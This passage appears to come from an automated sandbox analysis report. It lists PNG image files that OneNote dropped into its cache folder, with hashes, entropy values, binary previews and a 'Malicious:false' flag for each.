                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000A.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4847
                                                                                                                                                                                                                  Entropy (8bit):7.950192613458318
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                                                                                                                                  MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                                                                                                                                  SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                                                                                                                                  SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                                                                                                                                  SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000B.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000C.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1657
                                                                                                                                                                                                                  Entropy (8bit):7.80882577056055
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                                                                                                                                  MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                                                                                                                                  SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                                                                                                                                  SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                                                                                                                                  SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000D.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2210
                                                                                                                                                                                                                  Entropy (8bit):7.86853667196985
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                                                                                                                                  MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                                                                                                                                  SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                                                                                                                                  SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                                                                                                                                  SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000E.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):14458
                                                                                                                                                                                                                  Entropy (8bit):7.944094738048628
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                                                                                                                                  MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                                                                                                                                  SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                                                                                                                                  SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                                                                                                                                  SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000F.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13030
                                                                                                                                                                                                                  Entropy (8bit):7.948664903731204
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                                                                                                                                  MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                                                                                                                                  SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                                                                                                                                  SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                                                                                                                                  SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000G.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3879
                                                                                                                                                                                                                  Entropy (8bit):7.9281351307465044
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                                                                                                                                  MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                                                                                                                                  SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                                                                                                                                  SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                                                                                                                                  SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000H.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):19235
                                                                                                                                                                                                                  Entropy (8bit):7.944867159042578
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                                                                                                                                  MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                                                                                                                                  SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                                                                                                                                  SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                                                                                                                                  SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000I.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):7374
                                                                                                                                                                                                                  Entropy (8bit):7.955141875077912
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                                                                                                                                  MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                                                                                                                                  SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                                                                                                                                  SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                                                                                                                                  SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000J.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000K.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):5386
                                                                                                                                                                                                                  Entropy (8bit):7.943706538857394
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                                                                                                                                  MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                                                                                                                                  SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                                                                                                                                  SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                                                                                                                                  SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000M.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4181
                                                                                                                                                                                                                  Entropy (8bit):7.950380155401321
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                                                                                                                                  MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                                                                                                                                  SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                                                                                                                                  SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
